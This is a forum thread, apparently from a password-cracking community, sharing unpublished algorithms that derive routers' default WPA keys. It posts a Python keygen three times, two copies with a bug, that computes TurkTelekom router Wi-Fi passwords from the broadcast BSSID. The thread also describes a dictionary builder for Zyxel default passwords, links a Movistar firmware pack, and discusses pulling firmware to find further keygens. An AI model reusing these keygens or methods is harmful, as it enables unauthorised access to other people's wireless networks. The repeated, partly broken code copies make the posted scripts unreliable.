Unpublished WPA key algorithms
- Thread starter gpuhash_me
- Start date
Same algorithm. Different charset.
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import re
def GetKey_TurkTelekom(bssid):
mac = bytes.fromhex(bssid)
charset = '3479abcdefghjkmnpqrstuvwxyzACDEFHJKLMNPRTUVWXY'
tmp_key = ''
xored_mac = bytearray(mac)
for i in range(6, 0, -1):
for j in range(i):
if i != 6:
xored_mac[j] ^= mac
tmp_key += charset[xored_mac[j] % 46]
key = ''
used = [0]*20
j = 7
for i in range(8):
key += tmp_key[j]
used[j] = 1
cnt = 0
for _ in range(20):
j = (j + 1) % 20
cnt += used[j] == 0
if cnt == 8:
break
return str(key)
def get_valid_bssid(bssid):
bssid = bssid.lower()
bssid = re.match("[0-9a-f]{2}([-:]?)[0-9a-f]{2}(\\1[0-9a-f]{2}){4}$", bssid)
if bssid:
return bssid[0].replace(':', '').replace('-', '')
def main():
if len(sys.argv) < 2:
print('Usage: {} <MAC>'.format(sys.argv[0]))
sys.exit(1)
bssid = get_valid_bssid(sys.argv[1])
if bssid:
print(GetKey_TurkTelekom(bssid))
else:
print("bssid must be in the format: 0A:0B:0C:1A:1B:1C, 0A-0B-0C-1A-1B-1C, or 0A0B0C1A1B1C")
sys.exit(1)
if __name__ == '__main__':
main()
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import re
def GetKey_TurkTelekom(bssid):
mac = bytes.fromhex(bssid)
charset = '3479abcdefghjkmnpqrstuvwxyzACDEFHJKLMNPRTUVWXY'
tmp_key = ''
xored_mac = bytearray(mac)
for i in range(6, 0, -1):
for j in range(i):
if i != 6:
xored_mac[j] ^= mac
tmp_key += charset[xored_mac[j] % 46]
key = ''
used = [0]*20
j = 7
for i in range(8):
key += tmp_key[j]
used[j] = 1
cnt = 0
for _ in range(20):
j = (j + 1) % 20
cnt += used[j] == 0
if cnt == 8:
break
return str(key)
def get_valid_bssid(bssid):
bssid = bssid.lower()
bssid = re.match("[0-9a-f]{2}([-:]?)[0-9a-f]{2}(\\1[0-9a-f]{2}){4}$", bssid)
if bssid:
return bssid[0].replace(':', '').replace('-', '')
def main():
if len(sys.argv) < 2:
print('Usage: {} <MAC>'.format(sys.argv[0]))
sys.exit(1)
bssid = get_valid_bssid(sys.argv[1])
if bssid:
print(GetKey_TurkTelekom(bssid))
else:
print("bssid must be in the format: 0A:0B:0C:1A:1B:1C, 0A-0B-0C-1A-1B-1C, or 0A0B0C1A1B1C")
sys.exit(1)
if __name__ == '__main__':
main()
I figured I'd write a dictionary builder in C++ for Zykgen gin and juice. Goes from S090 to S180. Resulting in a 7Gb file with all passwords length 10
If you want to change the password length just edit the text file and re-compile.
Alternatively if you want a different cocktail (except for 1,3, 13 and 14) just change the ambiguous and non-ambiguous charsets.
Sadly failed to find the VIVO DSL-100NH-T1-NV unknown algo passwords
If you want to change the password length just edit the text file and re-compile.
Alternatively if you want a different cocktail (except for 1,3, 13 and 14) just change the ambiguous and non-ambiguous charsets.
Sadly failed to find the VIVO DSL-100NH-T1-NV unknown algo passwords
This should work. If someone can confirm or not.
Python:
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import re
def GetKey_TurkTelekom(bssid):
mac = bytes.fromhex(bssid)
charset = '3479abcdefghjkmnpqrstuvwxyzACDEFHJKLMNPRTUVWXY'
tmp_key = ''
xored_mac = bytearray(mac)
for i in range(6, 0, -1):
for j in range(i):
if i != 6:
xored_mac[j] ^= mac[i]
tmp_key += charset[xored_mac[j] % 46]
key = ''
used = [0]*20
j = 7
for i in range(8):
key += tmp_key[j]
used[j] = 1
cnt = 0
for _ in range(20):
j = (j + 1) % 20
cnt += used[j] == 0
if cnt == 8:
break
return str(key)
def get_valid_bssid(bssid):
bssid = bssid.lower()
bssid = re.match("[0-9a-f]{2}([-:]?)[0-9a-f]{2}(\\1[0-9a-f]{2}){4}$", bssid)
if bssid:
return bssid[0].replace(':', '').replace('-', '')
def main():
if len(sys.argv) < 2:
print('Usage: {} <MAC>'.format(sys.argv[0]))
sys.exit(1)
bssid = get_valid_bssid(sys.argv[1])
if bssid:
print(GetKey_TurkTelekom(bssid))
else:
print("bssid must be in the format: 0A:0B:0C:1A:1B:1C, 0A-0B-0C-1A-1B-1C, or 0A0B0C1A1B1C")
sys.exit(1)
if __name__ == '__main__':
main()wpa2wpa2
Active member
Mirror -> https://www.mediafire.com/file/livs...ter+Firmware+Mitrastar+Askey+Comtrend.7z/fileMistrastar / Askey / Comtrend routers and repeaters 2025 firmware pack for Movistar (Telefonica) Spain (MOVISTAR_XXXX and MOVISTAR-WIFI6-XXX):
File folder on MEGA
mega.nz
@SubZero5 Have you seen any evidence that anybody has a keygen for those? (on different forums perhaps) If somebody has cracked them, it might be worth a look. If not, we know that ZTE and Huawei do not include their WIFI keygens in any of the firmware we have looked at so far, so it's a real long shot.
SubZero5
Active member
Never seen anything like that. And I think that probably you could only see and/or find/extract the firmware upgrade files. You need to find a factory image file... Maby a device needs to be opened and it's firmware needs to be extracted...
FiosFiend
Active member
Firmware upgrade files are still good places to look for algorithms, they usually contain the complete code not just the “upgrades”. We’re lucky when the vendor provides the firmware for us, more often though it requires catching the upgrade link with wire shark or pulling the firmware from the physical device. Both of those require us to have a unit on hand, and you’re probably the closest person to having one. If you’re able to obtain a unit, we can likely help you learn how to do this.Never seen anything like that. And I think that probably you could only see and/or find/extract the firmware upgrade files. You need to find a factory image file... Maby a device needs to be opened and it's firmware needs to be extracted...
@Sparton let me know that the algorithm he shared only works on the 8 length AC1200 models. The newer TP-Link HGW AX1800 Model EX20v are 12 length and does not work on them. The newer TP HGW uses the same charset but a different algo. So there are still some interesting things to uncover there…
Str0nger
New member
@Sparton, it is not possible to obtain the decryption results that you published in the post https://forum.hashkiller.io/index.php?threads/3x-fiberhgw_tp-pmkids.77521/ using your published script. Or am I doing something wrong or did you use a different algorithm for decryption?Here is the script.
